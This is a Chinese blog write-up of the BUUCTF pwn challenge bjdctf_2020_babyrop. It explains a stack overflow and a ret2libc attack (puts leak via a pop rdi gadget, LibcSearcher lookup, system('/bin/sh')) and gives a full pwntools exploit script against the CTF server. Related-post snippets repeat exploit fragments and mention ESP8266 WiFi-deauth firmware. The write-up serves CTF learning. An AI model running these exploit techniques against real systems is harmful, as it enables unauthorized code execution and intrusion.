[BUUCTF]PWN——bjdctf_2020_babyrop

最新推荐文章于 2022-10-27 10:12:51 发布
最新推荐文章于 2022-10-27 10:12:51 发布
阅读量2.9k 收藏 4
点赞数 8
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108947927
版权
本文详细介绍了如何利用64位程序中的溢出漏洞,通过ROP技术泄露libc地址,然后计算system和/bin/sh的地址,最终构造payload获取shell的过程。涉及知识点包括ida分析、ROP gadget寻找、libc搜索以及交互式shell的建立。
摘要由CSDN通过智能技术生成

bjdctf_2020_babyrop[64位libc泄露]

题目附件

解题步骤:
例行检查,64位程序,开启了NX保护
在这里插入图片描述
试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目
在这里插入图片描述
64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’)

从main函数开始看程序
在这里插入图片描述
main函数调用了一个vuln函数
在这里插入图片描述
buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞

根据已有的信息和得到的提示,是一道64位的libc泄露

利用思路:

  1. 利用puts函数去泄露libc版本(一定是使用程序里已经调用过的函数才可以)
  2. 计算偏移量,算出程序里的system函数和字符串“/bin/sh”的地址
  3. 利用溢出漏洞,构造rop,获取shell

利用过程:

  1. 泄露libc
    64位程序在传参的时候需要用到寄存器
    当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
    当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。
    我们找一下设置rdi寄存器的指令
ROPgadget --binary bjdctf_2020_babyrop |grep "pop rdi"

在这里插入图片描述

payload='a'*(0x20+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_addr)
  1. 计算system和bin/sh的实际地址
offset=puts_addr-libc.dump('puts')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')
  1. 构造rop,获取shell
payload='a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(system)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

基本上的过程就是这样,在泄露libc的时候有关recv接收几个字节的具体的推荐内容,推荐加上context.log_level='debug'这句代码,自己调试,自己看看

完整EXP

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',28032)
elf=ELF('./bjdctf_2020_babyrop')
context.log_level='debug'

main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400733

payload='a'*(0x20+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()
puts_addr=u64(r.recv(6).ljust(8,'\x00'))

libc=LibcSearcher('puts',puts_addr)

offset=puts_addr-libc.dump('puts')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

payload='a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(system)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

r.interactive()

匹配到多个libc,选第一个
在这里插入图片描述

Angel~Yan
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
bjdctf_2020_babyrop
m0_52231248的博客
11-15 902
bjdctf_2020_babyrop Ubuntu16 Checksec: Ida: 标准的ret2libc,有puts函数,offest=0x28 Exp: from pwn import * from LibcSearcher import * context(log_level='debug') p = remote("node4.buuoj.cn",26832) elf = ELF('./bjdctf_2020_babyrop') read_got = elf.got['re
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN-PRACTICE-CTFSHOW-5
P1umH0的博客
01-16 415
PWN-PRACTICE-CTFSHOW-5BJDCTF2020-router36D杯-签到36D杯-babyFmtstr36D杯-MagicString BJDCTF2020-router 36D杯-签到 栈溢出,用ROPgadget找到一个"sh"字符串,ROP,程序过滤了cat和空格,more<flag绕过即可 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 295
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
bjdctf2020 babyrop
pondzhang的专栏
05-09 300
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 447
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 435
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
bjdctf_2020_babyropBUUCTF
qq_41696518的博客
08-31 337
bjdctf_2020_babyrop
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 710
bjdctf_2020_babyrop
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 410
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 773
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
BUUCTF(pwn)bjdctf_2020_babyrop
半岛铁盒的博客
03-31 436
from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',25519) elf=ELF('./2') main=0x4006ad rdi=0x400733 puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] payload='a'*(0x20+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendl...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值